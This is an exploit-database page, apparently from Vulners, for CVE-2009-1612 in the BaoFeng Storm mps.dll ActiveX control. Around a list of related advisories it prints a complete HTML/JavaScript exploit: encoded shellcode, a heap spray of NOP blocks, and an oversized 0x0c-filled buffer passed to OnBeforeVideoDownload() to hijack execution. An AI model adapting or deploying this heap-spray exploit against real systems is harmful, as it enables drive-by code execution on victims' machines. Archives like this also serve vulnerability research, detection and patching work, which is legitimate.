Lucene search
+L

BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow

🗓️ 30 Apr 2009 00:00:00Reported by MITBOYType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

BaoFeng Remote Buffer Overflow in 'OnBeforeVideoDownload()' Active

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-1612
30 Apr 200900:00
circl
CVE
CVE-2009-1612
11 May 200920:00
cve
Cvelist
CVE-2009-1612
11 May 200920:00
cvelist
Exploit DB
BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
30 Apr 201000:00
exploitdb
Metasploit
BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
2 Mar 201002:26
metasploit
NVD
CVE-2009-1612
11 May 200920:30
nvd
OpenVAS
BaoFeng Storm ActiveX Control Buffer Overflow Vulnerability
19 May 200900:00
openvas
OpenVAS
BaoFeng Storm ActiveX Control Buffer Overflow Vulnerability
19 May 200900:00
openvas
Packet Storm
BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
3 Mar 201000:00
packetstorm
Prion
Stack overflow
11 May 200920:30
prion
Rows per page
#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL    :     mps.dll
# Problem Func   :   OnBeforeVideoDownload()

<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="target"></object>
<input type="button" onclick="test()" value="test" />
<script>
function test()
{
    var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace)
        bigblock+=bigblock;

    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000)
        block = block+block+fillblock;

    memory = new Array();
    for (x=0; x<300; x++)
        memory[x] = block + shellcode;
    var buffer = '';
    while (buffer.length < 4150)
        buffer+="\x0c\x0c\x0c\x0c";
    target.OnBeforeVideoDownload(buffer);
}
</script>
</body>
</html>

# milw0rm.com [2009-04-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Apr 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.33255
35